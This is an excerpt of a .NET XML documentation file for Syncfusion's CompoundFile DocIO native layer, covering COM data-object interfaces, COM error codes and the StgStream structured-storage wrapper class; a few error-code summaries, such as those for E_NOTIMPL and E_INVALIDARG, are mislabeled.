        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.EnumFormatEtc(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC@)">
            <summary>
            Creates an object for enumerating the FORMATETC structures for a data object. 
            These structures are used in calls to IDataObject::GetData or IDataObject::SetData.
            </summary>
            <param name="dwDirection">Direction of the data through a value from the enumeration DATADIR.</param>
            <param name="ppenumFormatEtc">Address of IEnumFORMATETC* pointer variable that receives 
            the interface pointer to the new enumerator object.</param>
            <returns>
            S_OK - Enumerator object was successfully created.
            E_NOTIMPL - The direction specified by dwDirection is not supported.
            OLE_S_USEREG - Requests that OLE enumerate the formats from the registry. 
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.DAdvise(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,System.UInt32,System.IntPtr,System.UInt32@)">
            <summary>
            Called by an object supporting an advise sink to create a connection between a data object and the advise sink.
            </summary>
            <param name="pformatetc">Pointer to a FORMATETC structure that defines the format, 
            target device, aspect, and medium that will be used for future notifications.</param>
            <param name="advf">DWORD that specifies a group of flags for controlling the advisory connection.</param>
            <param name="pAdvSink">Pointer to the IAdviseSink interface on the advisory sink that will 
            receive the change notification.</param>
            <param name="pdwConnection">Pointer to a DWORD token that identifies this connection.</param>
            <returns>
            S_OK - The advisory connection was created.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.DUnadvise(System.UInt32)">
            <summary>
            Destroys a notification connection that had been previously set up.
            </summary>
            <param name="dwConnection"> DWORD token that specifies the connection to 
            remove. Use the value returned by IDataObject::DAdvise when the connection was originally established.</param>
            <returns>
            S_OK - The specified connection was successfully deleted. 
            OLE_E_NOCONNECTION - The specified dwConnection is not a valid connection. 
            OLE_E_ADVISENOTSUPPORTED - This IDataObject implementation does not support notification.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.IComDataObject.EnumDAdvise(System.IntPtr@)">
            <summary>
            Creates an object that can be used to enumerate the current advisory connections.
            </summary>
            <param name="ppenumAdvise">Address of IEnumSTATDATA* pointer variable that 
            receives the interface pointer to the new enumerator object.</param>
            <returns>
            S_OK - The enumerator object is successfully instantiated or there are no connections. 
            OLE_E_ADVISENOTSUPPORTED - Advisory notifications are not supported by this object. 
            </returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes">
            <summary>
            Error and succes codes
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.S_OK">
            <summary>
            Success code.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.S_FALSE">
            <summary>
            Success code.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.E_FAIL">
            <summary>
            General access denied error.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.E_NOTIMPL">
            <summary>
            Ran out of memory.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.E_INVALIDARG">
            <summary>
             No such interface supported.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.E_UNEXPECTED">
            <summary>
            Catastrophic failure.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.DV_E_FORMATETC">
            <summary>
            Invalid FORMATETC structure
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.ComErrorCodes.OLE_E_ADVISENOTSUPPORTED">
            <summary>
            This implementation doesn't take advises.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.DataObjectEntry">
            <summary>
            Class thet represents the data object entry.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.DataObjectEntry.#ctor(Syncfusion.CompoundFile.DocIO.Native.DATADIR,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM,Syncfusion.CompoundFile.DocIO.Native.FORMATETC)">
            <summary>
            Creates new instance of DataObjectEntry.
            </summary>
            <param name="dir">Datadir object.</param>
            <param name="medium">Parent StgMedium object.</param>
            <param name="format">Parent Formatec object.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.ComEnumFORMATETC">
            <summary>
            Class thet represents the enum formatec class.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComEnumFORMATETC.Clone(Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC@)">
            <summary>
            Creates another connection point enumerator with the same state as the 
            current enumerator to iterate over the same list.
            </summary>
            <param name="ppenum">Pointer to the returned IComEnumFORMATETC interface.</param>
            <returns>This method supports the standard return values 
            E_INVALIDARG, E_OUTOFMEMORY, and E_UNEXPECTED.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComEnumFORMATETC.RemoteNext(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,System.UInt32@)">
            <summary>
            The RemoteNext method retrieves a specified number of HRESULT structures.
            </summary>
            <param name="celt">The number of STATSTG structures requested.</param>
            <param name="rgelt">An array of STATSTG structures returned.</param>
            <param name="pceltFetched">The number of STATSTG structures retrieved in the rgelt parameter.</param>
            <returns>S_OK - The number of STATSTG structures returned equals the number 
            specified in the celt parameter.
            Otherwise - error code.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComEnumFORMATETC.Reset">
            <summary>
            Resets the enumeration sequence to the beginning.
            </summary>
            <returns>S_OK</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComEnumFORMATETC.Skip(System.UInt32)">
            <summary>
            Instructs the enumerator to skip the next celt elements in the enumeration 
            so that the next call to IEnumConnectionPoints::Next will not return those elements.
            </summary>
            <param name="celt">Number of elements to be skipped.</param>
            <returns>S_OK if the number of elements skipped is celt; otherwise, S_FALSE.</returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.ComDataObject">
            <exclude/>
             <summary>
             ComDataObject class.
             </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.GetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@)">
            <summary>
            Retrieves data.
            </summary>
            <param name="pformatetcIn">Point to Formatec structure.</param>
            <param name="pRemoteMedium">Point to Stgmedium sturcture.</param>
            <returns>Returns error code.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.GetDataHere(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@)">
            <summary>
            Similar to GetData, except the client must allocate the STGMEDIUM structure.
            </summary>
            <param name="pformatetc">Point to FORMATETC sturcture.</param>
            <param name="pRemoteMedium">Point to STGMEDIUM structure.</param>
            <returns>Returns E_NOTIMPL.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.QueryGetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@)">
            <summary>
            Determines whether the data object supports a particular 
            FORMATETC structure for transferring data.
            </summary>
            <param name="pformatetc">Point to FORMATETC sturcture.</param>
            <returns>Returns E_NOTIMPL.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.GetCanonicalFormatEtc(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.FORMATETC@)">
            <summary>
            Retrieves a logically equivalent FORMATETC structure to one that is more complex.
            </summary>
            <param name="pformatectIn">Pointer to the FORMATETC structure that defines the format.</param>
            <param name="pformatetcOut">Pointer to a FORMATETC structure that contains 
            the most general information possible for a specific rendering.</param>
            <returns>Returns E_NOTIMPL.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.SetData(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,Syncfusion.CompoundFile.DocIO.Native.STGMEDIUM@,System.Int32)">
            <summary>
            Sets the value for a specific data point.
            </summary>
            <param name="pformatetc">Pointer to the FORMATETC structure that defines the format.</param>
            <param name="pmedium">Point to STGMEDIUM structure.</param>
            <param name="fRelease">Int to relise.</param>
            <returns>Returns S_OK</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.EnumFormatEtc(System.UInt32,Syncfusion.CompoundFile.DocIO.Native.IComEnumFORMATETC@)">
            <summary>
            Creates an enumerator to iterate through the FORMATETC structures 
            supported by the data object.
            </summary>
            <param name="dwDirection">Direction of the data through a value from the enumeration DATADIR.</param>
            <param name="ppenumFormatEtc">Address of IEnumFORMATETC* pointer variable that 
            receives the interface pointer to the new enumerator object.</param>
            <returns>Returns E_NOTIMPL.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.DAdvise(Syncfusion.CompoundFile.DocIO.Native.FORMATETC@,System.UInt32,System.IntPtr,System.UInt32@)">
            <summary>
            Establishes a connection between the data object and an advise sink.
            </summary>
            <param name="pformatetc">Pointer to a FORMATETC structure that defines the format.</param>
            <param name="advf">DWORD that specifies a group of flags for 
            controlling the advisory connection.</param>
            <param name="pAdvSink">Pointer to the IAdviseSink interface on the advisory sink 
            that will receive the change notification.</param>
            <param name="pdwConnection">Pointer to a DWORD token that identifies this connection.</param>
            <returns>Returns E_ADVISENOTSUPPORTED.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.DUnadvise(System.UInt32)">
            <summary>
            Terminates a connection previously established through DAdvise.
            </summary>
            <param name="dwConnection">DWORD token that specifies the connection to remove. 
            Use the value returned by IDataObject::DAdvise when the connection 
            was originally established.</param>
            <returns>Returns E_ADVISENOTSUPPORTED.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.ComDataObject.EnumDAdvise(System.IntPtr@)">
            <summary>
            Creates an enumerator to iterate through the current advisory connections.
            </summary>
            <param name="ppenumAdvise">Address of IEnumSTATDATA* pointer variable 
            that receives the interface pointer to the new enumerator object.</param>
            <returns>Returns E_ADVISENOTSUPPORTED.</returns>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.StgStream">
            <summary>
            Storage API wrapper classes provide access to storage data from .NET code.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_STORE_READONLY">
            <summary>
            Open storage in read-only mode.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_STREAM_READONLY">
            <summary>
            Open storage stream in read-only mode.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_STREAM_CREATE">
            <summary>
            Create a new stream in storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_READWRITE">
            <summary>
            Open storage or stream in ReadWrite mode.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_BUFFER_SIZE">
            <summary>
            Default buffer size for stream copying.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.DEF_STORAGE_READONLY">
            <summary>
            Options to open storage in read-only mode. Used to open already opened file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_stream">
            <summary>
            Reference in COM interface which provides access to stream in storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_storage">
            <summary>
            Reference in COM interface which provide access to storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_bIsDisposed">
            <summary>
            True if class was disposed; otherwise False.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_bCanRead">
            <summary>
            True if stream supports read operation; otherwise False.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_bCanWrite">
            <summary>
            True stream supports write operation; otherwise False.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_bCanSeek">
            <summary>
            True if stream supports seek operation; otherwise False.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_bIsTransacted">
            <summary>
            True if stream opened in Transaction mode and on Flush method call
            class must commit transaction; otherwise False.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_lLength">
            <summary>
            Length of stream data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_arrStreams">
            <summary>
            List of streams names provided by storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_arrStorages">
            <summary>
            List of storage names found in current storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_strFileName">
            <summary>
            File name of storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_strStreamName">
            <summary>
            Stream name.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_strStorageName">
            <summary>
            Sub-storage name opened by class.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_modeStorage">
            <summary>
            Storage Mode: Open or Create.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_modeStream">
            <summary>
            Stream Mode: Open or Create.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_lPosition">
            <summary>
            Current stream position, used for optimization. Allows users
            to skip Seek operations if required.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.StgStream.m_lockBytes">
            <summary>
            Represents the locking bytes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Close">
            <summary>
            Closes the stream.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Flush">
            <summary>
            Commit changes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Commit(Syncfusion.CompoundFile.DocIO.Native.STGC)">
            <summary>
            Commit changes.
            </summary>
            <param name="code">Commit code.</param>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When commit operation fails.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Revert">
            <summary>
            Discards all changes that have been made to the storage object
            since the last commit operation.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Seek(System.Int64,System.IO.SeekOrigin)">
            <summary>
            Seek in stream.
            </summary>
            <param name="offset">New offset.</param>
            <param name="origin">Start point for Seek operation.</param>
            <returns>Current position.</returns>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When seek operation fails.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.SetLength(System.Int64)">
            <summary>
            Set stream length.
            </summary>
            <param name="value">New stream length</param>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When SetLength operation fails.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Read(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Read data from stream.
            </summary>
            <param name="buffer">Output stream.</param>
            <param name="offset">Offset in output buffer.</param>
            <param name="count">Quantity of bytes to read.</param>
            <returns>Quantity of read bytes.</returns>
            <exception cref="T:System.ArgumentNullException">
            When buffer is NULL.
            </exception>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When offset or count is less than zero.
            </exception>
            <exception cref="T:System.ArgumentException">
            When there are not enough items in the buffer.
            </exception>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When Read operation fails.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Write(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Write data to stream.
            </summary>
            <param name="buffer">Buffer with data.</param>
            <param name="offset">Offset in input buffer from which data started.</param>
            <param name="count">Quantity of bytes which must be written.</param>
            <exception cref="T:System.ArgumentNullException">
            When buffer is NULL.
            </exception>
            <exception cref="T:System.ArgumentOutOfRangeException">
            When offset or count is less than zero.
            </exception>
            <exception cref="T:System.ArgumentException">
            When there are not enough items in the buffer 
            or stream is in Read-only mode.
            </exception>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When Write operation fails.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor">
            <summary>
            To prevent class creation by default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Open storage/compound file.
            </summary>
            <param name="fileName">File name of storage.</param>
            <param name="flags">Mode which must be used for open operation.</param>
            <exception cref="T:System.ArgumentNullException">
            When fileName is NULL.
            </exception>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            Couldn't open the storage
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Open storage and one stream of it.
            </summary>
            <param name="fileName">File name of storage.</param>
            <param name="storeFlags">Flags that are used for storage open.</param>
            <param name="streamName">Stream name.</param>
            <param name="streamFlags">Flags which used for stream in storage open.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.String,System.String)">
            <summary>
            Open storage and its stream in Read-only mode.
            </summary>
            <param name="fileName">File name.</param>
            <param name="streamName">Stream name.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.String)">
            <summary>
            Open storage in Read-only mode but do not open stream. To open
            special stream, use OpenStream methods.
            </summary>
            <param name="fileName">Storage file name.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(Syncfusion.CompoundFile.DocIO.Native.StgStream,System.String)">
            <summary>
            Inherit stream storage and opens its stream in Read-only mode.
            </summary>
            <param name="storage">Storage of stream.</param>
            <param name="streamName">Stream name to open.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(Syncfusion.CompoundFile.DocIO.Native.StgStream,System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Inherit stream storage and opensits streams with the user specified flags.
            </summary>
            <param name="storage">Storage to inherit.</param>
            <param name="streamName">Stream name.</param>
            <param name="streamFlags">Stream open flags.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(Syncfusion.CompoundFile.DocIO.Native.StgStream,System.String,System.Boolean)">
            <summary>
            Open or create stream specified by user name. 
            </summary>
            <param name="storage">Inherited storage.</param>
            <param name="streamName">Stream name.</param>
            <param name="bCreate">True to create stream; otherwise open.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(Syncfusion.CompoundFile.DocIO.Native.StgStream,System.String,Syncfusion.CompoundFile.DocIO.Native.STGM,System.Boolean)">
            <summary>
            Inherit storage and open or create in it stream with spcified user name
            </summary>
            <param name="storage">Inherited storage.</param>
            <param name="streamName">Stream name.</param>
            <param name="streamFlags">Stream open / create flags.</param>
            <param name="bCreate">True to create stream; otherwise open.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.IO.Stream,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Create a new instance of StgStream.
            </summary>
            <param name="stream">Base stream.</param>
            <param name="flags">Flags for create stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.#ctor(System.IO.Stream)">
            <summary>
            Create a new instance of StgStream by defoult flag.
            </summary>
            <param name="stream">Base stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.Dispose">
            <summary>
            Dispose stream. Close stream, release references on COM interfaces, and
            free resources.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.OpenStream(System.String)">
            <summary>
            Open stream in Read-only mode.
            </summary>
            <param name="streamName">Stream name.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.OpenStream(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Open stream from storage with specified flags.
            </summary>
            <param name="streamName">Stream name.</param>
            <param name="streamFlags">Stream open flags.</param>
            <exception cref="T:System.ArgumentNullException">
            When streamName is NULL.
            </exception>
            <exception cref="T:System.ArgumentException">
            When the specified stream could not be found in the storage.
            </exception>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When it was not possible to open the stream.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.OpenSubStorage(System.String)">
            <summary>
            Opens sub storage.
            </summary>
            <param name="storageName">Storage name to open.</param>
            <returns>Returns stream of opened storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.OpenSubStorage(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Opens sub storage.
            </summary>
            <param name="storageName">Storage name to open.</param>
            <param name="flags">Open flags.</param>
            <returns>Returns stream of opened storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateSubStorage(System.String)">
            <summary>
            Creates sub storage.
            </summary>
            <param name="storageName">Storage name to Create.</param>
            <returns>Returns stream of opened storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateSubStorage(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Creates sub storage.
            </summary>
            <param name="storageName">Storage name for create.</param>
            <param name="flags">Create flags.</param>
            <returns>Returns stream for created storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateStream(System.String)">
            <summary>
            Create stream in opened storage with specified name.
            </summary>
            <param name="streamName">Stream name.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateStream(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Create stream in storage with specified name and flags.
            </summary>
            <param name="streamName">Stream name.</param>
            <param name="streamFlags">Stream flags.</param>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When its not possible to create stream.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.SaveILockBytesIntoStream(System.IO.Stream)">
            <summary>
            Saves internal ILockBytes into stream.
            </summary>
            <param name="stream">Stream to save into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.FindStream(System.String)">
            <summary>
            Searches for stream name in the streams array ignoring case.
            </summary>
            <param name="strStreamName">Stream name to locate.</param>
            <returns>Name of the stream in the storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.ContainsStream(System.String)">
            <summary>
            Indicates whether storage contains required stream.
            </summary>
            <param name="strStreamName">Stream to search.</param>
            <returns>True if stream was found.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.ContainsStorage(System.String)">
            <summary>
            Indicates whether storage contains required substorage.
            </summary>
            <param name="strStorageName">Storage to search.</param>
            <returns>True if stream was found.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.RemoveElement(System.String)">
            <summary>
            Removes the specified storage or stream from this storage object.
            </summary>
            <param name="elementName">Name of the storage or stream to be removed.</param>
            <returns>
            0 - The element was successfully removed.
            Otherwise error code.
            </returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CopySourceStorages(Syncfusion.CompoundFile.DocIO.Native.StgStream,Syncfusion.CompoundFile.DocIO.Native.StgStream)">
            <summary>
            Copies one storage into another.
            </summary>
            <param name="source">Source stream.</param>
            <param name="destination">Destination stream.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateStorage(System.String)">
            <summary>
            Method to create new storage and return StgStream class for it.
            </summary>
            <param name="fileName">Storage file name.</param>
            <returns>Reference on instance which knows how to work with it.</returns>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When compound file couldn't be created.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CreateStorageOnILockBytes">
            <summary>
            Cretes storage on ILockBytes.
            </summary>
            <returns>Created storage.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CheckStorage">
            <summary>
            Check storage availability.
            </summary>
            <exception cref="T:System.ArgumentNullException">
            If storage is NULL.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CheckStream">
            <summary>
            Check stream availability.
            </summary>
            <exception cref="T:System.ArgumentNullException">
            When stream is NULL.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CalculateStreamLength">
            <summary>
            Calculate stream length.
            </summary>
            <returns>Returns length of currently open stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CalculateStorageStreams">
            <summary>
            Returns list of streams stored in storage.
            </summary>
            <returns>List of stream names.</returns>
            <exception cref="T:System.Runtime.InteropServices.ExternalException">
            When elements of the storage couldn't be enumerated .
            </exception>
            <exception cref="T:System.SystemException">
            When it is possible to get IEnumSTATSTG interface reference from storage.
            </exception>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CalculateStorageSubStorages">
            <summary>
            Return list of sub-storages found in current storage.
            </summary>
            <returns>List of found storages.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CalculateSubItemsNames">
            <summary>
            Calculates subItems names.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.ByTypeAccumulate_Streams(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection to add.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.ByTypeAccumulate_Storages(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data as stream type.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection where adding is.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.ByTypeAccumulate_All(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data as all type.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection where adding is.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.StgStream.CalculateSubItems(Syncfusion.CompoundFile.DocIO.Native.StgStream.SubItemNameEventHandler,System.Object)">
            <summary>
            Calculates subItems.
            </summary>
            <param name="caller">SubItem event handler.</param>
            <param name="userData">User data.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.CanRead">
            <summary>
            Indicates if stream supports Read operation. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.CanSeek">
            <summary>
            Indicates if stream supports Seek operation. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.CanWrite">
            <summary>
            Indicates if stream supports Write operation. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.IsTransacted">
            <summary>
            Indicates if stream is opened in Transaction mode. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.Length">
            <summary>
            Length of stream. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.Position">
            <summary>
            Gets / sets current position of stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.Streams">
            <summary>
            Gets list of stream names found in storage. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.Storages">
            <summary>
            Gets the array of string thet is a storages.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.COMStorage">
            <summary>
            Reference in COM interface which provide access to storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.COMStream">
            <summary>
            Reference in COM interface which provide access to stream in storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.StreamName">
            <summary>
            Get name of stream opened by the class.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.StorageName">
            <summary>
            Get name of sub storage opened by the class.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.LockBytes">
            <summary>
            Gets the IlockBytes interface that represen the locked bytes.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.StgStream.FileName">
            <summary>
            Gets the file name.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.StgStream.SubItemNameEventHandler">
            <summary>
            Delegate that represents subItem name event.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.Storage">
            <summary>
            Compound storage implementation based on standard COM-object.
            </summary>
        </member>
